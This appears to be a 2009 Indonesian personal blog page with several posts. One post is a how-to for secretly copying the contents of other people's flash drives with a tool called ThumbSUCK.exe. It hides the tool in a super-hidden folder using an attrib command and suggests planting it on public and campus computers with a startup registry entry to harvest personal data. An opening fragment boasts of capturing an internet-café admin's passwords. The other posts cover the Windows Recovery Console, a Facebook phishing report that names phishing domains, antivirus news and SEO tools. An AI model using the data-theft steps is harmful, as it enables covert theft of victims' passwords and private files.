Cara diatas sudah saya coba pada 4 buah warnet di sidoarjo dan hasilnya saya
berhasil mendapatkan catatan aktivitas sang admin (password etc..). Tapi untuk
penerapan "PEMBALASAN" tentu saya tidak melakukan hal sekejam itu ;P

Tuesday, October 27, 2009

Mencuri Data-Data Milik Pengguna FLASHDISK

FlashDISK merupakan media penyimpanan portable yang kini makin banyak digunakan oleh para pengguna komputer di Indonesia. Selain harganya yang makin murah, kapasitasnya pun kian besar dengan ukuran fisik yang kian mini dari generasi ke generasi ;)

Nah, biasanya nich, orang seringkali akan menyimpan data-data sensitifnya di dalam flashdisk. Dan tak jarang, seseorang menyimpan PASSWORD account-accountnya pada suatu file teks yang disimpan dalam FlashDISK.

Anda mengincar target yang demikian? caranya cukup mudah. Alat dan bahan yang perlu anda persiapkan adalah:

ThumbsuCK.exe - download secara cuma-cuma di member area http://spyrozone.net kategory Tools & Utility



Setelah anda mendownloadnya, copy ThumbSUCK.exe kedalam suatu directory tersembunyi. Misalnya saja anda letakkan di Local Drive D:\. Buatlah suatu directory dengan atribut SUPER HIDDEN agar korban tidak curiga. Ikuti panduan berikut:



1. Buatlah directory baru di D:\ atau dimanapun anda suka. Beri nama terserah anda.

Pada contoh ini saya beri nama gudangkorban. Salinlah ThumbSUCK.exe kedalam

directory tersebut lalu klik 2X untuk menjalankannnya.

2. Klik Start - Run lalu ketik cmd untuk memanggil Windows Command Processor

3. Kini saatnya menjadikan directory tersebut menjadi super hidden. Gunakan saja

perintah attrib dengan format attrib lokasifolder +s +h. Karena nama directory

yang tadi dibuat adalah gudangkorban yang terletak di drive D:\ maka ketik:

attrib d:\gudangkorban +s +h

lalu tekan ENTER.



Selesai sudah.. kini cobalah anda tancapkan sendiri FlashDISK anda. Data-data anda yang berada didalam FlashDISK akan disalin dengan silent mode oleh ThumbSUCK.exe kedalam directory gudangkorban di suatu folder dengan nama sesuai dengan volume label Flashdisk.

Karena directory gudangkorban diberi atribut super hidden, maka hilangkan terlebihdahulu tanda centang pada opsi Hide Protected Operating System Files (Recomended) dan beri centang pada Show Hidden Files and Folders di Folder Options (Tools -> Folder Options pada Windows Explorer).

Untuk mendisable aplikasi ini, gunakan Windows TaskManager (CTRL-ALT-DELETE) atau gunakan saja TaskMANAGER kesayangan anda.

Bagaimana jika ditanam di komputer public? atau ditanam di lab-lab kampus? Hmm.. dengan sedikit beramain-main Registry, anda dapat membuat aplikasi ini otomatis berjalan ketika windows startup ;p hehehe.. tentunya anda bisa panen data pribadi orang lain ^_^

Menginstall Windows Recovery Console Pada Boot Menu Windows XP

...oO---(O) Preface

Ketika Windows XP anda bermasalah, sering kali Anda akan diminta untuk melakukan repair dengan cara memasukkan CD windows anda, Restart untuk Boot dari CD, lalu masuk kedalam Windows Recovery Console. Windows Recovery Console mulai ditambahkan pada fitur OS Microsoft Windows 2000, Windows XP, dan Windows Server 2003. Fungsi utama dari fitur ini ialah sebagai alat bantu bagi Administrator untuk mengatasi permasalahan Booting pada Windows. Sesuai dengan namanya, antarmuka yang diberikan merupakan antarmuka berbasis Command line. Jadi, dibutuhkan dasar penguasaan perintah-perintah DOS apabila Anda ingin memanfaatkan fitur ini.

Artikel kali ini akan membahas tentang bagaimana cara menambahkan Windows Recovery Console Pada Opsi Menu Booting Windows XP. Hal ini bermanfaat apabila suatu ketika Windows anda bermasalah, maka anda tidak perlu lagi repot-repot mencari dan memasukkan CD Instalasi Windows anda karena Windows Recovery Console sudah terinstall di Hard Drive. Jadi nantinya, Anda Cukup me-Restart komputer Anda, tinggal pilih dech menu untuk masuk kedalam Recovery Console. Lebih praktis bukan?

...oO---(0) Langkah-Langkah



---( Langkah 1

Nah, langsung saya mulai yach.. pertama-tama masukkan CD instalasi Windows Anda. Saya yakin lebih dari 50% dari Anda masih pakai Windows bajakan.. hehehe.. ^_^ maka dari itu saya beritahukan, demi kelancaran proses instalasi, sangat direkomendasikan CD Instalasi yang anda masukkan SAMA dengan CD yang dulu Anda pergunakan untuk menginstall Windows Anda yang sekarang. Sebenarnya nggak harus CD yang sama sich, lebih tepatnya VERSI WINDOWS XP YANG SAMA.

Setelah itu, Klik [Start] -> [Run] lalu ketik:

CDROOM-DRIVE-LETTER-ANDA:\i386\winnt32.exe /cmdcons

Jadi misalnya Drive Letter CD Room Anda adalah E: maka ketik:

E:\i386\winnt32.exe /cmdcons

Anda akan disodori dengan kotak dialog konfirmasi untuk memastikan bahwa anda benar-benar ingin melakukan Instalasi Windows Recovery Console.





Pilih [Yes] untuk memulai Instalasi. Ikuti prosesnya dengan khusyu' & khidmat (awas.. jangan sampai ketiduran yach.. ^_^)




---( Langkah 2


Jika berhasil, Anda akan mendapati kotak dialog pemberitahuan seperti berikut ini...


Yippy.. kini Restart komputer anda. Anda akan mendapati menu Microsoft Windows Recovery Console pada Menu Booting Windows XP Anda.




---( Langkah 3

Coba ajah masuk kesana (Windows Recovery Console), maka Anda akan disodori pertanyaan Windows yang mana yang ingin anda masuki.


Dalam kasus ini saya mengetikkan 1 untuk masuk kedalam Windows nomor 1 karena memang hanya ada 1 windows terinstall pada komputer saya.


. . . . .


Nah.. kini Anda sudah siap untuk menikmati Windows recovery Console. Perintah-perintah yang paling sering dipergunakan antara lain:

chkdsk /r
------------
Perintah ini akan memeriksa harddisk pada Drive yang sedang aktif dari Bad Sector lalu otomatis melakukan perbaikan apabila terdapat error pada Hard Disk.


Listsvc
------------
Perintah ini akan menampilkan seluruh service dan driver mana saja yang sedang dijalankan beserta status startup masing-masing. Perintah ini hanya berfungsi untuk menampilkan saja. Jadi, apabila anda ingin memanfaatkan kesaktian perintah ini, maka anda dapat memanfaatkan perintah enable atau disable untuk mengaktifkan atau mematikan Service dan driver yang tampil tersebut.

Perintah dasar untuk enable:

enable namaservice [start_type]

start_type dalam perintah itu ialah parameter untuk menentukan bagaimana service akan dijalankan. Macam-macam start_type yang dapat anda pergunakan antara lain:

SERVICE_BOOT_START
SERVICE_SYSTEM_START
SERVICE_AUTO_START
SERVICE_DEMAND_START

Contoh penggunaan perintah enable:

enable namaservice SERVICE_SYSTEM_START


Untuk perintah disable, hampir sama dengan perintah enable. Perintah dasar untuk disable:

disable namaservice [start_type]


Fixboot
------------
Perintah ini berfungsi untuk menulis sebuah Volume Boot Record (VBS) ke sebuah volume/partisi. Volume Boot Record merupakan sektor pertama dari media penyimpanan yang tidak terpartisi, atau sektor pertama dari setiap partisi tunggal pada media penyimpanan yang telah terpartisi. VBS hanya mengandung kode untuk me-load dan memanggil sistem operasi (atau program lainnya) dalam media atau partisi yang sama.


Fixmbr
------------
Perintah ini berfungsi untuk menulis sebuah Master Boot Record (MBR) ke sebuah disk. MBR adalah sebutan untuk sektor pertama dari sebuah hard disk. Di dalam MBR terdapat kode booting sistem operasi utama, yang dapat membuat hard disk melakukan proses booting ke sistem operasi. Kode ini disebut juga dengan Master Boot Code. Selain itu, dalam MBR terdapat Tabel partisi yang berisi daftar partisi apa saja yang terdapat dalam hard disk yang bersangkutan.

Masih banyak perintah-perintah lain yang dapat anda manfaatkan. Jika anda ingin mengetahui perintah-perintah apa saja yang dapat anda pergunakan, ketik: HELP


Udah gitu aja. thanks for reading

Monday, October 26, 2009

Facebook kena Phising?


Facebook telah berhasil menghentikan phising di situsnya, worm itu mendorong pengguna untuk menuju ke halaman Facebook palsu dan menyuruh mereka login kedalamnya dengan mengklik link “Check this out”.

Berhati-hatilah. Pengirim phishing sedang mencari korban di Facebook. Korban bisa kehilangan password di situs jaringan sosial yang sedang popular ini.

Dalam serangannya, orang akan dikirim email pancingan, yang seakan-akan berasal dari Facebook. Namun saat dibuka akan menggiring korbannya ke situs Fbaction.net yang tampak seperti halaman log-in di Facebook.


Menurut IDG-News Service, Fbaction.net baru hidup pada Rabu sore (29/04). Tetapi Facebook sudah memasukan situs itu ke dalam daftar hitam, dan berharap agar situs tersebut ditutup.

"Kami sadar ini phishing domain dan kami telah mulai mengambil tindakan," kata juru bicara Facebook dalam sebuah pernyataan.

"Tim operasi kami telah memblokir domain dan menghapus konten yang berisi pesan tersebut. Mereka telah mereset password si pengirim phishing untuk menghilangkan akses. Kami juga akan bekerja sama dengan ISP (Internet Service Provider) untuk mendapatkan informasi, dan akan berusaha memasukan pemiliknya ke kasus pidana," tambah juru bicara itu.

Serangan itu dengan mengirim si korban pesan dengan subyek "Hello", yang sepertinya datang dari seorang teman, menurut TechCrunch yang pertama melaporkan adanya serangan itu. Pesan hanya berisi "Kunjungi http://www.facebook.com/l/4253f; http://fbaction.net/" . URL itu mengalihkan korban ke situs web Fbaction.net.

Korban serangan phishing sebenarnya mendapat beberapa peringatan. Yang pertama saat user mengklik link di dalam pesan asli jika diarahkan keluar situs Facebook. Peringatan lain muncul setelah memasukkan nama pengguna dan password pada situs phishing dan diarahkan kembali ke Facebook.

Situs Fbaction.net tidak menyerang komputer korban, tapi hanya mencoba untuk mengumpulkan informasi log-in, yaitu username dan password Facebook.

Kejahatan seperti ini sering kali mengumpulkan berbagai jenis informasi, karena biasanya pengguna komputer menggunakan username dan password yang sama untuk beberapa situs. Meng-hack akun Facebook juga berguna untuk meluncurkan serangan selanjutnya.

Schnitt menambahkan bahwa Facebook juga bekerja sama dengan partner MarkMonitor, yang menemukan phishing URL di kebanyakan browser, lalu memblokirnya dan menghubungi bagian ISP untuk mematikan alamat website palsu tersebut. Schnitt mengungkapkan, user seharusnya memastikan bahwa mereka memasuki alamat web www.facebook.com, dan jika bukan domain tersebut, berarti hanya spam.

blockedfacebookaccounts.tk, coba saja anda klik link ini maka anda akan diarahkan ke Situs Phising Facebook (bukan link Facebook Asli). Hati-Hati Yaa….

SUDAH LIAT KAN BUKTINYA :) ????

Perhatikan URL Situs Phising Facebook yang diberi kotak berwarna merah diatas, disitu sangat jelas terlihat dari nama dan favicon websitenya.


Gratis, Microsoft Antivirus

Microsoft, sang raksasa software di dunia memang tidak sedang main-main ketika meluncurkan ide untuk membuat sebuah program antivirus gratis karena pada minggu depan program antivirus gratis dari Microsoft itu akan memasuki tahap pengujian Beta untuk publik.

Nama program antivirus gratis dari Microsoft itu adalah Microsoft Security Essentials (MSE), sebelumnya bernama ‘Morro’. Dan rencananya bagi pengguna Windows dapat mendownloadnya secara gratis.

Karena link aslinya ada masalah, anda bisa mendonload dari sofpedia:

http://www.softpedia.com/progDownload/Microsoft-Security-Essentials-Download-131683.html


Prosedur STANDAR Instalasi ANTIVIRUS:
1. Download AntiVirus Baru yang akan anda install
2. Disable semua koneksi keluar masuk (J2ringan Internet harus Off)
3. Uninstall Anti Virus lama yang sudah ada di komputer atau laptop anda
4. Restart Laptop or Komputer anda
5. Install AntiVirus Baru Anda
6. Update Anti Virus Baru Anda
7. Full Scan Laptop or Komputer tersebut


Ada beberapa hal yang perlu diketahui tentang program antivirus gratis dari Microsoft ini, yang sebelumnya pihak Microsoft lebih banyak berdiam diri untuk tidak banyak berkomentar ketika ditanya tentang proyek antivirus gratis mereka.
* MSE menyediakan perlindungan berupa antivirus dan anti-malware untuk sistem Windows XP SP2, Windows Vista dan Windows 7 (termasuk Beta atau Release Candidate). MSE memiliki core engine yang sama dengan yang ditawarkan oleh produk Forefront Client untuk bisnis, namun MSE tidak menyediakan kemampuan manajemen seperti yang terdapat pada Forefront Client — atau seperti yang ditawarkan kepada pengguna Windows Live OneCare sebelumnya.
* Microsoft mengumumkan bahwa MSE tersedia untuk pengujian beta publik mulai dari tanggal 23 Juni. MSE akan tersedia untuk 32- dan 64-bit, didownload langsung dari situs Microsoft Connect. Versi pengujian ditujukan kepada pengguna yang penduduknya berbahasa Inggris, ditambah Brasil, Israel dan Cina.
* Versi beta akan tetap dibuka sampai produk MSE versi final dirilis sebelum akhir tahun 2009. (Microsoft tidak menyebutkan tanggal kepastian peluncuran resminya) Produk final akan tersedia untuk didownload secara gratis di Microsoft.com.
* Microsoft akan mengupdate dan memperbaharui kode beta secara rutin pada beberapa bulan ke depan dengan memanfaatkan update melalui Windows Update dan mekanisme melalui Web lainnya.
* Microsoft berencana menawarkan pilihan kepada pemilik PC OEM dan system builders untuk membundel MSE ke PC baru mereka, namun tidak berharap para pembuat PC besar untuk ikut andil, karena saat ini para pembuat PC besar pun bersaing menawarkan program antivirus dari perusahaan lainnya.
* Berbicara mengenai produk dari pihak ketiga, MSE akan menguninstal Windows Defender jika terdapat program tersebut dalam PC pengguna, dikarenakan MSE adalah sebuah “superset” dari Defender. Selama proses instalasi, MSE akan menganjurkan pengguna untuk menguninstal program-program antivirus yang sebelumnya sudah terinstal, hal ini karena menjalankan banyak program antivirus akan memperlambat kinerja PC.
* MSE ditujukan dan diutamakan kepada para pengguna yang belum atau tidak memiliki uang untuk membeli software antivirus/anti-malware. Nantinya tidak akan diminta registrasi, tidak ada versi trial dengan tanggal kadaluarsa atau permintaan untuk kembali memperbaharui. Namun Microsoft membatasi download MSE (versi beta dan final) hanya untuk para pengguna yang menggunakan PC Windows Original (alias bukan Windows bajakan).
Nah ini info bagus ut para pemakai komputer, terutama pemakai mesin kasir POS yg sudah pasti sekarang pake Windows Original, ada soft antivirus gratis, dari Microsoft lagi :) .

10 tools terbaik untuk menganalisa halaman Web/Blog

Keberhasilan beberapa blog/situs populer bukan karena kejeniusan mereka memainkan SEO dan Keyword, bukan juga karena content yang mereka tulis memang merupakan materi populer, tapi banyak sekali faktor-faktor yang menentukan, ini sebaiknya yang harus kita cermati sekaligus dipelajari jika ingin blog kita benar2 bisa sejajar dengan blog/situs populer lainnya. Cara inilah yang selalu saya lakukan bila setiap kali menemukan situs2 populer, saya selalu melakukan riset, mempelajarinya, lalu mencoba mengakses keberbagai data statistik mereka. Dan cara ini lumayan berhasil dari pada saya harus menghabiskan waktu mempelajari keyword utama mereka, apalagi sampai membuat duplikat konten terbaik pada situs populer tersebut :D pokoknya jangan sampai dah..

Nah, daripada tanya sana-sini gak jelas, lebih baik saya sarankan kita mencoba menganalisa statistik halaman mereka secara langsung. Caranya mudah saja, coba pelajari statistik halaman kita sendiri terlebih dahulu, sekarang coba bandingkan dengan beberapa halaman web populer lainya. Lihat dan coba perhatikan statistik web mereka, misalkan dengan membandingkan kecepatan loading page, bandingkan jumlah karakter keyword dan deskripsi yang mereka gunakan, pada layanan populer mana saja halaman mereka teridex bla..bla.. dan tentu saja masih banyak lagi yang harus kita pelajari. Yang jelas, semakin sering kita melakukan riset, semakin banyak pula ilmu untuk memudahkan kita menemukan jawabannya.


Dibawah ini merupakan 10 tools terbaik yang biasa saya gunakan untuk melakukan riset dan mencoba menganalisa halaman-halaman web/blog target, silahkan dicoba aja dulu:

1. En.pageboss.com

Pageboss mampu menganalisa halaman blog dengan lengkap dan sukup mendetail, kita bisa melihat beberapa informasi penting diantaranya site ranking dan kualitas trafik dari beberapa search engine dan layanan statistik populer lainnya.

2. Seorush.com

Cara kerja Seorush hampir mirip dengan Pageboss, sayang halaman yang ditayangkan tidak begitu detail. tapi lumayan juga sebagai tool pembanding.

3. Pagemasher.com

Layanan ini juga memberikan analisa yang sangat lengkap, setiap analisa ditayangkan berdasarkan tab tersendiri. sayangnya beberapa alamat domain kadang ada yang tidak support.

4. Urlmetrix.com

Tools UrlMatrix ini pernah saya jelaskan di tulisan sebelumnya, jadi silahkan di baca kembali tulisan terdahulu disini.

5. Tools.pingdom.com

Cool..layanan Page Speed Test inilah yang sampai saat ini masih saya gunakan, layanan ini mampu memberikan informasi lengkap dalam mengalisa setiap ukuran image yang kita gunakan pada halaman web. Terus terang saya selalu memperhatikan masalah ukuran gambar, anda bisa cek sendiri sebesar apapun ukuran gambar yang saya gunakan dan biasnaya tidak lebih besar dari 10KB.

6. Browsershots.org

Jangan bangga dulu dengan tampilan desain template kita saat ini, sebagus apapun kalau cuman bagusnya di firefox doank kan percuma hehehe. jadi selalu gunakan layanan Browsershots sebagai tools pembanding apakah tampilan blog/site kita sudah tampil sesuai harapan jika ditampilkan menggunakan web browser yang berbeda.

7. Websiteoptimization.com

Tool ini termasuk web page speed report yang akurat, dan ada banyak sekali informasi yang tayangkan. Selain hanya menyampainkan informasi penting pada halaman web yang dianalsis, kita juga diberikan solusi serta pemecahan masalah.

8. Seocentro.com

SeoCentro merupakan salah satu tool SEO favorite saya, walaupun termasuk tool SEO jadul, tapi perannya sangat berguna juga sebagai Meta Tag analysis.

9. Tester.jonasjohn.de

Tools analisis web dan SEO yang terbilang sangat kompleks dimana layanan ini dikemas kedalam satu paket all in one. Terus terang saya jarang sekali menggunakan layanan ini tapi tidak ada salahnya di uji coba dulu :)

10. GHDB

Mana ada tools web analisis terbaik selain Google itu sendiri, manfaatkan selalu Google Search untuk mencari informasi sebanyak-banyaknya. Gali dan terus gali semua informasi yang anda butuhkan..karena apapun pertanyaan anda semua sudah terjawab di Google. Satu rahasia yang jarang diungkap para master SEO, yaitu Google hack dan basic SEO dari Google itu sendiri..ini bisa rekan pelajari pada GHDB (Google Hack Data Base) yang sebenarnya sudah lama sekali dikelompokan kedalam satu database yang dikembangkan oleh Johnny i hack stuff. Silahkan pelajari cara Google menganalisa halaman web target, tapi bukan cara h*cking-nya lho ya. Trus alamat link-nya mana?? nah itu dia, silahkan di Googling aja pasti ketemu kok :D

Followers

Call me

My e-mail is
1. andraeinstein@yahoo.co.id
2. andrachemical@yahoo.com
3. andraeinstein@gmail.com

My site is
1. andrachemical.blogspot.com
2. andraeinstein.blogspot.com
3. creamcommunity.blogspot.com
4. andrachemical.cc.cc

  ©This Website is Edited by Nusendra Hanggarawan Copyright at 2009 and this site is protected by COPYSCAPE.